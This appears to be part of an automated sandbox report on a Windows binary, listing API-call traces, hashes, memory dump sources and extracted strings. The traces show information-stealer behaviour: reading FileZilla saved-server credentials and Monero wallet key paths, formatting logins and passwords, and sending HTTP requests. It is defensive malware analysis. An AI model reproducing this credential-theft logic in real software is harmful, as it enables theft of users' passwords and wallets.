                              • Opcode Fuzzy Hash: e9b5210095d41e2ad02b18ae2052997a9d9cff1e7a38e10be2af33d97787887d
                              • Instruction Fuzzy Hash: 6C9207F3A0C2049FE304AE2DEC8567AB7E6EF94720F1A463DEAC5C7744E63558058792
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A015B8,00A00D96), ref: 009EF71E
                              • StrCmpCA.SHLWAPI(?,00A015BC), ref: 009EF76F
                              • StrCmpCA.SHLWAPI(?,00A015C0), ref: 009EF785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 009EFAB1
                              • FindClose.KERNEL32(000000FF), ref: 009EFAC3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                               • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: c9fc8eafc4dc32af92a692200c9e31988f778257582d7775ca414fe53d44e41e
                              • Instruction ID: 5f4c2cf392590dbb0aabfbc9590847954f83af5dfbb978afad58db9d9b756058
                              • Opcode Fuzzy Hash: c9fc8eafc4dc32af92a692200c9e31988f778257582d7775ca414fe53d44e41e
                              • Instruction Fuzzy Hash: A1119AB180014DABDB14FB70DC55BFD7378AF50340F5086A5A61E57492EF702B4AC792
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                               • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ay
                              • API String ID: 0-3544545429
                              • Opcode ID: 24866636bc1ce9cc1a9885269cdb12921cb5b68b54f3c703d73fa38d723dd989
                              • Instruction ID: 5665a42dc3f4d1a857868dd029b8fb87ab66d2576cd4ce120e1153f990b178fe
                              • Opcode Fuzzy Hash: 24866636bc1ce9cc1a9885269cdb12921cb5b68b54f3c703d73fa38d723dd989
                              • Instruction Fuzzy Hash: 5B514EF3B1C7045BE3086E29EC95BBAFBD9DBD4324F1A453DE984D7380E97A58008651
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                               • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: JG7/
                              • API String ID: 0-2616090989
                              • Opcode ID: c5933db55820e759e25e92b1321713b92ee5a9d0fdb89571a8dc15a42a42da12
                              • Instruction ID: c38afa4a07c3fb7010255c7479c880fe8593afe83e8bfef77f919926d6780fc9
                              • Opcode Fuzzy Hash: c5933db55820e759e25e92b1321713b92ee5a9d0fdb89571a8dc15a42a42da12
                              • Instruction Fuzzy Hash: A4319EB26183049FE308BE29EC8677AF7E5EF50750F06892DE5C6C2340EA7568848B17
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                               • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5e8b8cf3f0b0c9324e1831aa445beabc300c3f73838fb8d28e573c59a8f3f494
                              • Instruction ID: 4ae43da7db2ad0074cbfe05fdcca5c69f341f0ab789a54d201c95e5b46b3b421
                              • Opcode Fuzzy Hash: 5e8b8cf3f0b0c9324e1831aa445beabc300c3f73838fb8d28e573c59a8f3f494
                              • Instruction Fuzzy Hash: B55147F3F442155BE308592DEC99766B6CA9B94320F2B023EDA89E73C0ED799C0142D6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                               • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b9a857b1af9e772554093859242b57c4ccefc60f823529e6be77aab5e75d8096
                              • Instruction ID: 0d4e0d407ad755a755362be267a0f476b2858aa761f92625296217e1365a5a04
                              • Opcode Fuzzy Hash: b9a857b1af9e772554093859242b57c4ccefc60f823529e6be77aab5e75d8096
                              • Instruction Fuzzy Hash: AE51E3F3A182149FF304AE29DCD577AB7D6EF94320F2A453DEBC887380D97958058652
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                               • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 494f22706f1cf44520f8cae987972a6c33d5001426ba8ebcaa90c9eafaa20395
                              • Instruction ID: 2c355adaa13307d49d6df4ef7dab26c571763e99c20352482abd5a961d493094
                              • Opcode Fuzzy Hash: 494f22706f1cf44520f8cae987972a6c33d5001426ba8ebcaa90c9eafaa20395
                              • Instruction Fuzzy Hash: C95118F360CA04DFEB16AE69EC45ABE77D5EB80310F26493FD6C296208FA3155419743
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                               • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2e6192480a4ba7eaa3d3561d4839ec40af5e2e172957edd4d4ee23f61aff591b
                              • Instruction ID: 6ac20f088f6430c27769ba74d6b56c75fb4036c122201eadd1371daaf5739099
                              • Opcode Fuzzy Hash: 2e6192480a4ba7eaa3d3561d4839ec40af5e2e172957edd4d4ee23f61aff591b
                              • Instruction Fuzzy Hash: 195137B3A0C3145FF314AA2DDC85BBAB7D5EFD0320F16453DE6C883780EA7558018696
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                               • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009F8E0B
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
                                • Part of subcall function 009E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009E99EC
                                • Part of subcall function 009E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 009E9A11
                                • Part of subcall function 009E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 009E9A31
                                • Part of subcall function 009E99C0: ReadFile.KERNEL32(000000FF,?,00000000,009E148F,00000000), ref: 009E9A5A
                                • Part of subcall function 009E99C0: LocalFree.KERNEL32(009E148F), ref: 009E9A90
                                • Part of subcall function 009E99C0: CloseHandle.KERNEL32(000000FF), ref: 009E9A9A
                                • Part of subcall function 009F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009F8E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00A00DBA,00A00DB7,00A00DB6,00A00DB3), ref: 009F0362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009F0369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 009F0385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A00DB2), ref: 009F0393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 009F03CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A00DB2), ref: 009F03DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 009F0419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A00DB2), ref: 009F0427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 009F0463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A00DB2), ref: 009F0475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A00DB2), ref: 009F0502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A00DB2), ref: 009F051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A00DB2), ref: 009F0532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A00DB2), ref: 009F054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 009F0562
                              • lstrcat.KERNEL32(?,profile: null), ref: 009F0571
                              • lstrcat.KERNEL32(?,url: ), ref: 009F0580
                              • lstrcat.KERNEL32(?,00000000), ref: 009F0593
                              • lstrcat.KERNEL32(?,00A01678), ref: 009F05A2
                              • lstrcat.KERNEL32(?,00000000), ref: 009F05B5
                              • lstrcat.KERNEL32(?,00A0167C), ref: 009F05C4
                              • lstrcat.KERNEL32(?,login: ), ref: 009F05D3
                              • lstrcat.KERNEL32(?,00000000), ref: 009F05E6
                              • lstrcat.KERNEL32(?,00A01688), ref: 009F05F5
                              • lstrcat.KERNEL32(?,password: ), ref: 009F0604
                              • lstrcat.KERNEL32(?,00000000), ref: 009F0617
                              • lstrcat.KERNEL32(?,00A01698), ref: 009F0626
                              • lstrcat.KERNEL32(?,00A0169C), ref: 009F0635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A00DB2), ref: 009F068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              APIs
                                • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
                                • Part of subcall function 009E47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 009E4839
                                • Part of subcall function 009E47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 009E4849
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009E59F8
                              • StrCmpCA.SHLWAPI(?,013BE3C0), ref: 009E5A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009E5B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,013BE3E0,00000000,?,013B9A38,00000000,?,00A01A1C), ref: 009E5E71
                              • lstrlen.KERNEL32(00000000), ref: 009E5E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 009E5E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009E5E9A
                              • lstrlen.KERNEL32(00000000), ref: 009E5EAF
                              • lstrlen.KERNEL32(00000000), ref: 009E5ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 009E5EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 009E5F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 009E5F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 009E5F4C
                              • InternetCloseHandle.WININET(00000000), ref: 009E5FB0
                              • InternetCloseHandle.WININET(00000000), ref: 009E5FBD
                              • HttpOpenRequestA.WININET(00000000,013BE290,?,013BDC98,00000000,00000000,00400100,00000000), ref: 009E5BF8
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                              • InternetCloseHandle.WININET(00000000), ref: 009E5FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                                • Part of subcall function 009F8B60: GetSystemTime.KERNEL32(00A00E1A,013B9A98,00A005AE,?,?,009E13F9,?,0000001A,00A00E1A,00000000,?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009F8B86
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 009ECF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 009ED0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009ED0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 009ED208
                              • lstrcat.KERNEL32(?,00A01478), ref: 009ED217
                              • lstrcat.KERNEL32(?,00000000), ref: 009ED22A
                              • lstrcat.KERNEL32(?,00A0147C), ref: 009ED239
                              • lstrcat.KERNEL32(?,00000000), ref: 009ED24C
                              • lstrcat.KERNEL32(?,00A01480), ref: 009ED25B
                              • lstrcat.KERNEL32(?,00000000), ref: 009ED26E
                              • lstrcat.KERNEL32(?,00A01484), ref: 009ED27D
                              • lstrcat.KERNEL32(?,00000000), ref: 009ED290
                              • lstrcat.KERNEL32(?,00A01488), ref: 009ED29F
                              • lstrcat.KERNEL32(?,00000000), ref: 009ED2B2
                              • lstrcat.KERNEL32(?,00A0148C), ref: 009ED2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 009ED2D4
                              • lstrcat.KERNEL32(?,00A01490), ref: 009ED2E3
                                • Part of subcall function 009FA820: lstrlen.KERNEL32(009E4F05,?,?,009E4F05,00A00DDE), ref: 009FA82B
